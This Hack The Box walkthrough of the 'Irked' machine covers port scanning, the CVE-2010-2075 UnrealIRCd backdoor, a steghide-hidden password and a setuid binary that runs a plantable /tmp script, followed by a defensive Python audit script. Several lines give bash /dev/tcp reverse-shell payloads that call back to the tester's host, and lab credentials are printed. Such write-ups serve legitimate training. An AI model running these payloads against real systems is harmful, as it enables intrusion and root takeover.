Irked-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: steganography, the IRC service, CVE-2010-2075, using the steghide tool, SUID privilege escalation

Reference: https://www.jgeek.cn/article/73

Reference: https://www.tagnull.de/post/irked/

0x01 Getting user access

1. Standard first step: the target's IP address is 10.10.10.117.

2. Run our htb-portscan.sh helper script against it. I have trimmed the redundant parts of the output.

┌──(kali㉿kali-linux-2022-2)-[~/Desktop/HTB-Tools-Kali/htb-portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.117 tcp
Starting nmap port scan against 10.10.10.117...
* Running the TCP port scan...
sudo nmap -min-rate 10000 -p- "10.10.10.117" -oG "10.10.10.117"-tcp-braker-allports

* Running TCP connect version detection and OS detection on the open ports...
sudo nmap -sT -sV -O -p"22,80,111,6697,8067,54143,65534," "10.10.10.117"
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
54143/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb)

* Running the nmap vuln scripts on the open ports...
sudo nmap --script=vuln -p"22,80,111,6697,8067,54143,65534," "10.10.10.117"
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /manual/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
111/tcp open rpcbind
6697/tcp open ircs-u
|_ssl-ccs-injection: No reply from server (TIMEOUT)
| irc-botnet-channels:
|_ ERROR: Closing Link: [10.10.14.7] (Too many unknown connections from your IP)
8067/tcp open infi-async
| irc-botnet-channels:
|_ ERROR: Closing Link: [10.10.14.7] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.
54143/tcp open unknown
65534/tcp open unknown

┌──(kali㉿kali-linux-2022-2)-[~/Desktop/HTB-Tools-Kali/htb-portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.117 udp
Starting nmap port scan against 10.10.10.117...
* Running the UDP port scan...
sudo nmap -min-rate 10000 -p- -sU "10.10.10.117" -oG "10.10.10.117"-udp-braker-allports

* Running UDP version detection and OS detection on the open ports...
sudo nmap -sV -sU -O -p"111,5353,56188," "10.10.10.117"
PORT STATE SERVICE VERSION
111/udp open rpcbind 2-4 (RPC #100000)
5353/udp open mdns DNS-based service discovery
56188/udp open status 1 (RPC #100024)

3. That is a fair amount of information. The part that stands out is the IRC service on 6697, 8067 and 65534, all identified as UnrealIRCd, with an admin e-mail of djmardov@irked.htb that already leaks a username. Note that 6697 is conventionally the TLS port, but nmap reports plain UnrealIRCd on it here and, as shown below, it accepts the exploit in cleartext.

IRC (Wikipedia)

IRC (Internet Relay Chat) is an application-layer protocol. It is used mainly for group chat, but it can also be used for one-to-one conversations. IRC servers listen on ports such as 6667 (plaintext, e.g. irc://irc.libera.chat) and 6697 (TLS, e.g. ircs://irc.libera.chat:6697).

UnrealIRCd (Wikipedia)

UnrealIRCd is an open-source IRC daemon, originally based on DreamForge, available for Unix-like operating systems and Windows. Since development started in May 1999 many features have been added and changed, including advanced security features and bug fixes, and it is now a widely used IRC server.

Setting up an IRC server: https://blog.logc.icu/post/2019-12-212247/

4. So this is a chat service.

5. Googling "unrealircd exploit github" turns up CVE-2010-2075. nmap did not report a version number, so it is not certain the box is affected, but it costs nothing to download the exploit and try. CVE-2010-2075 is the backdoor that shipped in the trojaned UnrealIRCd 3.2.8.1 tarball: any line received that starts with "AB" is passed straight to system() before IRC parsing, so the exploit simply sends "AB;" followed by the command to run. The shell's working directory, ~/Unreal3.2, is consistent with the 3.2 branch. Start the nc listener before sending the payload.

https://github.com/FredBrave/CVE-2010-2075-UnrealIRCd-3.2.8.1

┌──(kali㉿kali-linux-2022-2)-[~/Desktop/CVE-2010-2075-UnrealIRCd-3.2.8.1]
└─$ python3 CVE-2010-2075.py -t 10.10.10.117 -p 6697 -c 'bash -c "bash -i >& /dev/tcp/10.10.14.7/10086 0>&1"'
Creating connection
Creating payload
[*]Sending Payload...

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ nc -lnvp 10086
listening on [any] 10086 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.117] 55175
bash: cannot set terminal process group (623): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$

6. That gives us a shell as the ircd user. Listing /home shows a second user, djmardov, and that both home directories are world-readable (drwxr-xr-x), which is what lets ircd walk into them.

ircd@irked:~/Unreal3.2$ ls -la /home
ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Sep 5 2022 .
drwxr-xr-x 21 root root 4096 Sep 8 2022 ..
drwxr-xr-x 18 djmardov djmardov 4096 Sep 5 2022 djmardov
drwxr-xr-x 3 ircd root 4096 Sep 5 2022 ircd
ircd@irked:~/Unreal3.2$

7. LinEnum turned up a password file in djmardov's Documents. Hold on to it for now: it is not djmardov's SSH password. The file is readable from the ircd account because it is mode 0644 inside a world-readable directory, and the note "steg backup pw" is a hint that it is a steghide passphrase rather than a login.

ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 12
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 .
drwxr-xr-x 18 djmardov djmardov 4096 Sep 5 2022 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
lrwxrwxrwx 1 root root 23 Sep 5 2022 user.txt -> /home/djmardov/user.txt
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
ircd@irked:/home/djmardov/Documents$

8. Back to port 80. The homepage is a single image (irked.jpg) that also points at the IRC service; the image is a steganographic carrier.

9. steghide with the passphrase from .backup (UPupDOWNdownLRlrBAbaSSss, entered at the prompt) extracts a pass.txt file:

┌──(kali㉿kali-linux-2022-2)-[~/Desktop/111]
└─$ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt".

┌──(kali㉿kali-linux-2022-2)-[~/Desktop/111]
└─$ cat pass.txt
Kab6h+m+bbp2J:HG

10. That is djmardov's password. SSH in and read the first flag, user.txt.

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ cd /home/djmardov
djmardov@irked:~$ cat user.txt
7b6ddb112f82170596288b71e663b43d
djmardov@irked:~$

0x02 Getting root

11. Continuing enumeration with linpeas shows a service listening only on localhost port 631 (the IPP/CUPS port). The command below forwards it to local port 1337 on Kali over SSH. In practice there was nothing useful behind it, but the forwarding itself is worth keeping as a technique.

sshpass -p 'Kab6h+m+bbp2J:HG' ssh djmardov@10.10.10.117 -L 1337:127.0.0.1:631

12. linpeas also reports a setuid-root binary, /usr/bin/viewuser. Running it shows the opening: after printing the logged-in users it runs /tmp/listusers through sh, and /tmp is writable by everyone, so any local user can supply that script.

djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2023-12-06 04:18 (:0)
djmardov pts/0 2023-12-06 04:39 (10.10.14.7)
sh: 1: /tmp/listusers: not found
djmardov@irked:~$

13. Write a reverse shell into that path. The first run fails with "Permission denied" because the file has no execute bit; chmod 777 (chmod +x would suffice) fixes that, and the next run of viewuser connects back as root. Note the id output of the resulting shell: uid is 0 but gid stays 1000 (djmardov), so the binary calls setuid(0) without setgid. A full root uid is also why bash -i keeps the privilege instead of dropping an effective-only uid.

echo 'bash -c "bash -i >& /dev/tcp/10.10.14.7/10010 0>&1"' > /tmp/listusers

djmardov@irked:~$ echo 'bash -c "bash -i >& /dev/tcp/10.10.14.7/10010 0>&1"' > /tmp/listusers
djmardov@irked:~$ cat /tmp/listusers
bash -c "bash -i >& /dev/tcp/10.10.14.7/10010 0>&1"
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2023-12-06 04:18 (:0)
djmardov pts/0 2023-12-06 04:39 (10.10.14.7)
sh: 1: /tmp/listusers: Permission denied
djmardov@irked:~$ chmod 777 /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2023-12-06 04:18 (:0)
djmardov pts/0 2023-12-06 04:39 (10.10.14.7)

┌──(kali㉿kali-linux-2022-2)-[~]
└─$ nc -lnvp 10010
listening on [any] 10010 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.117] 52127
root@irked:~#

root@irked:~# id
id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
root@irked:~# cat /root/root.txt
cat /root/root.txt
7250dbb58e1059d4c5400136e3810589
root@irked:~#
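The check a practitioner would run after linpeas flags a binary like viewuser, as an added example that is not part of the original writeup or of the box: find setuid/setgid files, look inside them for strings that name a path under a world-writable directory (/tmp, /var/tmp, /dev/shm), and report whether the current user could plant that path. The sample "binary" built by `build_sample` is a constructed fixture with the strings "/usr/bin/who" and "/tmp/listusers" embedded; all function names here are assumptions for the example.

```python
import os
import re
import stat
import tempfile
from typing import Dict, List, Tuple

# A setuid-root program that executes a path under one of these directories
# hands root to whichever local user creates that file first.
WRITABLE_PATH_RE = re.compile(rb"/(?:tmp|var/tmp|dev/shm)/[A-Za-z0-9._/-]+")


def is_setuid(path: str) -> bool:
    """True for a regular file carrying the setuid or setgid bit."""
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def find_setuid(root: str = "/") -> List[str]:
    """Walk `root` and return every setuid/setgid file (the find -perm -4000 step)."""
    found: List[str] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                if is_setuid(p):
                    found.append(p)
            except OSError:
                pass  # unreadable or vanished entry; keep scanning
    return sorted(found)


def writable_paths_in(path: str) -> List[str]:
    """Strings inside the file that name a path under a world-writable directory."""
    with open(path, "rb") as f:
        data = f.read()
    return sorted({m.decode() for m in WRITABLE_PATH_RE.findall(data)})


def hijack_status(path: str) -> str:
    """Whether this user could plant `path`: creatable, writable or blocked."""
    if not os.path.exists(path):
        parent = os.path.dirname(path) or "."
        return "creatable" if os.access(parent, os.W_OK) else "blocked"
    return "writable" if os.access(path, os.W_OK) else "blocked"


def audit_files(paths: List[str]) -> Dict[str, Dict[str, str]]:
    """Map each binary referencing a world-writable path to {path: status}."""
    report: Dict[str, Dict[str, str]] = {}
    for p in paths:
        try:
            refs = writable_paths_in(p)
        except OSError:
            continue
        if refs:
            report[p] = {r: hijack_status(r) for r in refs}
    return report


def audit(root: str = "/") -> Dict[str, Dict[str, str]]:
    """Full pass: every setuid file under `root` that names a plantable path."""
    return audit_files(find_setuid(root))


def build_sample() -> Tuple[str, str, str]:
    """Constructed fixture: a fake setuid 'viewuser' and a clean file in a temp dir."""
    d = tempfile.mkdtemp()
    vuln = os.path.join(d, "viewuser")
    with open(vuln, "wb") as f:
        f.write(b"\x7fELF\x00setuid\x00/usr/bin/who\x00/tmp/listusers\x00")
    os.chmod(vuln, 0o4755)  # the owner may set the setuid bit on its own file
    clean = os.path.join(d, "passwd")
    with open(clean, "wb") as f:
        f.write(b"\x7fELF\x00/etc/passwd\x00")
    return d, vuln, clean


if __name__ == "__main__":
    for binary, refs in audit().items():
        for ref, status in refs.items():
            print(f"{binary}: runs {ref} ({status})")
```

On the box this reports /usr/bin/viewuser running /tmp/listusers as "creatable", which is exactly the condition step 13 exploits. The fix on the binary's side is the mirror image: execute only absolute paths in root-owned, non-writable directories, avoid system() from a setuid context, and drop privileges (both uid and gid) before spawning anything.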

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/163


https://sh1yan.top/2023/12/06/Irked-htb-writeup/
Author: shiyan
Published: 2023-12-06